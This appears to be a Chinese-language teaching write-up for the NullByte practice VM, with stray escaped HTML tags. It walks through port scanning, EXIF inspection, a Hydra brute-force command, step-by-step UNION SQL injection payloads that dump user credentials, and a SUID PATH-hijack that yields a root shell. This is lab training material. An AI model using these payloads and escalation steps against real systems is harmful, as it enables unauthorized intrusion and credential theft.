NullByte 靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 主机发现与端口扫描<\/h3>
使用 nmap<\/code> 进行初始扫描：<\/p>
nmap -sV -p- 目标IP
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

80端口：HTTP服务<\/li>
111端口：RPC服务<\/li>
777端口：SSH服务（修改了默认22端口）<\/li>
37200端口：RPC服务<\/li>
<\/ul>
1.2 服务识别与漏洞扫描<\/h3>
使用 nmap<\/code> 脚本扫描漏洞：<\/p>
nmap --script vuln 目标IP
<\/span><\/span><\/code><\/pre>未发现可直接利用的漏洞。<\/p>
2. Web渗透阶段<\/h2>
2.1 初始访问<\/h3>
访问80端口发现一张图片，关键步骤：<\/p>

检查图片EXIF信息：<\/li>
<\/ol>
exiftool 图片文件名
<\/span><\/span><\/code><\/pre>发现隐藏字符串，指向网站目录 \/kzMb5nVYJw\/<\/code><\/p>
2.2 目录扫描<\/h3>
使用工具（如dirb、gobuster）扫描：<\/p>
gobuster dir -u http:\/\/目标IP -w \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>发现：<\/p>

\/phpmyadmin\/<\/li>
\/uploads\/<\/li>
<\/ul>
2.3 密码破解<\/h3>
在发现的目录中找到输入框，通过以下方法破解：<\/p>

使用Burp Suite或Hydra进行暴力破解<\/li>
推荐Hydra命令：<\/li>
<\/ol>
hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 目标IP http-post-form "\/kzMb5nVYJw\/420search.php:usrtosearch=^USER^&submit=Submit:Invalid"<\/span>
<\/span><\/span><\/code><\/pre>2.4 SQL注入利用<\/h3>
发现SQL注入点，手动注入步骤：<\/p>

确定列数：<\/li>
<\/ol>
" order by 3-- 
<\/span><\/span><\/span>"<\/span> order<\/span> by<\/span> 4<\/span>-- 
<\/span><\/span><\/span><\/code><\/pre>确定有3列<\/p>

联合查询获取信息：<\/li>
<\/ol>
" union select 1,2,3-- 
<\/span><\/span><\/span><\/code><\/pre>确定数据显示位置<\/p>

获取数据库信息：<\/li>
<\/ol>
" union select database(),version(),3-- 
<\/span><\/span><\/span><\/code><\/pre>数据库名：seth，版本>5<\/p>

获取表信息：<\/li>
<\/ol>
" union select database(),(select group_concat(table_name) from information_schema.tables where table_schema="<\/span>seth"),3-- 
<\/span><\/span><\/span><\/code><\/pre>发现users表<\/p>

获取列信息：<\/li>
<\/ol>
" union select database(),(select group_concat(column_name) from information_schema.columns where table_name="<\/span>users"),3-- 
<\/span><\/span><\/span><\/code><\/pre>列：id, user, pass, position<\/p>

获取数据：<\/li>
<\/ol>
" union select (select group_concat(id,0x7e,user,0x7e,pass,0x7e,position) from users),(select group_concat(column_name) from information_schema.columns where table_name="<\/span>users"),3-- 
<\/span><\/span><\/span><\/code><\/pre>发现密码为base64编码，解码后为MD5哈希<\/p>
3. 系统访问<\/h2>
3.1 SSH登录<\/h3>
使用获取的用户名和密码通过777端口登录：<\/p>
ssh -p 777<\/span> 用户名@目标IP
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 初始检查<\/h3>
检查用户权限：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>无sudo权限<\/p>
4.2 SUID提权<\/h3>

查找SUID文件：<\/li>
<\/ol>
find \/ -perm -4000 -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现 \/var\/www\/backup\/procwatch<\/code><\/p>

分析文件：<\/li>
<\/ol>
strings \/var\/www\/backup\/procwatch
<\/span><\/span><\/code><\/pre>发现调用ps<\/code>命令<\/p>

利用方法：<\/li>
<\/ol>
cd \/tmp
<\/span><\/span>ln -s \/bin\/bash ps
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span>\/var\/www\/backup\/procwatch
<\/span><\/span><\/code><\/pre>获得root shell<\/p>
5. 关键知识点总结<\/h2>

信息收集<\/strong>：全面扫描端口和服务，注意非常规端口<\/li>
隐写分析<\/strong>：检查图片等文件的元数据（EXIF）<\/li>
密码破解<\/strong>：合理选择工具（Hydra优于Burp）<\/li>
SQL注入<\/strong>：

手工注入流程<\/li>
信息收集技巧<\/li>
数据提取方法<\/li>
<\/ul>
<\/li>
权限提升<\/strong>：

SUID利用<\/li>
PATH环境变量劫持<\/li>
<\/ul>
<\/li>
靶机设计<\/strong>：避免过度依赖隐写等非典型渗透技巧<\/li>
<\/ol>
6. 改进建议<\/h2>

使用自动化工具（如sqlmap）提高效率：<\/li>
<\/ol>
sqlmap -u "http:\/\/目标IP\/kzMb5nVYJw\/420search.php?usrtosearch=1"<\/span> --dbs
<\/span><\/span><\/code><\/pre>
提权时可先尝试内核漏洞：<\/li>
<\/ol>
uname -a
<\/span><\/span>searchsploit 内核版本
<\/span><\/span><\/code><\/pre>
建立系统化渗透流程，避免遗漏关键步骤<\/li>
<\/ol>